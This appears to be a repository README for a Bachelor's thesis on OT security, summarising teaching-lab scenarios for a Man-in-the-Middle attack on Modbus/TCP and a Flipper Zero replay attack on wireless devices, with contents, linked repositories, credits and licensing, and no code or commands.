This repo hosts my Bachelor's thesis about OT Security.
Abstract • Content of the Thesis • Stack • Credits • License
This thesis examines the security of embedded systems in a world where the boundary between IT and OT become increasingly thinner. Traditionally, OT systems were physically isolated to ensure security. However, with the advent of the IoT, these systems are becoming more interconnected, making them more susceptible to cyberattacks.
In response to these evolving challenges, the University of applied Sciences Western Switzerland, HES-SO Valais Wallis overhauled its teaching laboratory dedicated to OT security. This lab will focus on practical, hands-on exercises to help students understand the unique challenges of securing embedded systems.
The primary objective of this thesis was to create realistic attack scenarios for use in these laboratories, with a focus on Modbus communication protocols and wireless systems. These scenarios are designed to help students identify vulnerabilities in OT systems and learn how to secure them effectively.
The thesis centres on two key attacks scenarios. The first is a Man-in-the-Middle attack on Modbus/TCP communication, demonstrating how an attacker can intercept and alter unencrypted messages. This scenario underlines the importance of implementing TLS and verifying digital certificates to mitigate such threats. The second scenario involves a replay attack on a wireless communication system, using the Flipper Zero device to capture and retransmit signals.
- Introduction (P.3-4)
- Impact on Sustainability (P.5)
- Analysis (P.6-14)
- Attacks (Sniffing, Spoofing, Denial of Service, Replay, Man in the Middle)
- Communication media (Modbus, wireless M-bus)
- Simulation environments (Factory I/O, Home I/O, Minecraft)
- Attack by Man in the Middle (P.15-24)
- Environment and requierements
- Attack on Modbus/TCP
- Implementation of TLS
- Attack on Modbus/TLS
- Attack by Replay (P.25-30)
- Environment and requierements
- Attack on Wireless M-Bus
- Attack on 433MHz transceiver
- Securits in wireless broadcast isolated device
- Conclusion (P.31-32)
Full report of this thesis available at 06-pdf/OT_Security-Heredero_Remi-FinalReport.pdf
The Man-in-the-Middle (MitM) scenario focuses on intercepting, modifying, and forwarding packets to gain control over a Modbus/TCP installation. This protocol, commonly used in industrial settings, was selected for this thesis because it is widely adopted and fulfils the requirement to demonstrate an attack on it. The MitM attack was chosen due to its prevalence and potential for significant impact. It is a comprehensive attack that encompasses several other techniques, such as sniffing and spoofing through ARP poisoning. This scenario assumes that the attacker has already gained access to the network, enabling them to intercept and manipulate the data packets
Main repo for this part are:
- Modbus interface for HomeIO simulation
- Controller for HomeIO simulation
- MitM on Modbus/TCP
- MitM on Modbus/TLS without certificat verification
The replay attack scenario involves intercepting and resending a message on a wireless connection to trigger the same effect as the original message, like, for example, a garage door opening remote. This scenario is particularly engaging because it can be easily implemented with the Flipper Zero device, making it more interactive and enjoyable for students to witness a physical attack in action. Additionally, it highlights the significance of wireless attacks, a critical topic in the OT world. This scenario operates at the physical layer, providing a complementary perspective to the MitM scenario.
Main repo for this part is:
For Go programmation a nice startup is what made cm0x4D for HEI Synd IIot security course. You can find it on https://hei-synd-iiot.github.io/golang/
- Rémi Heredero for the Thesis
- Yann Sierro, Louis Heredero for proofreading
- Silvan Zahno and all guys from Typst for the Typst template
- The Typst template used is on MIT license.
- Some Typst module are under Apache 2.0 or GPL 3.0
- The content of this Thesis is under GPL 3.0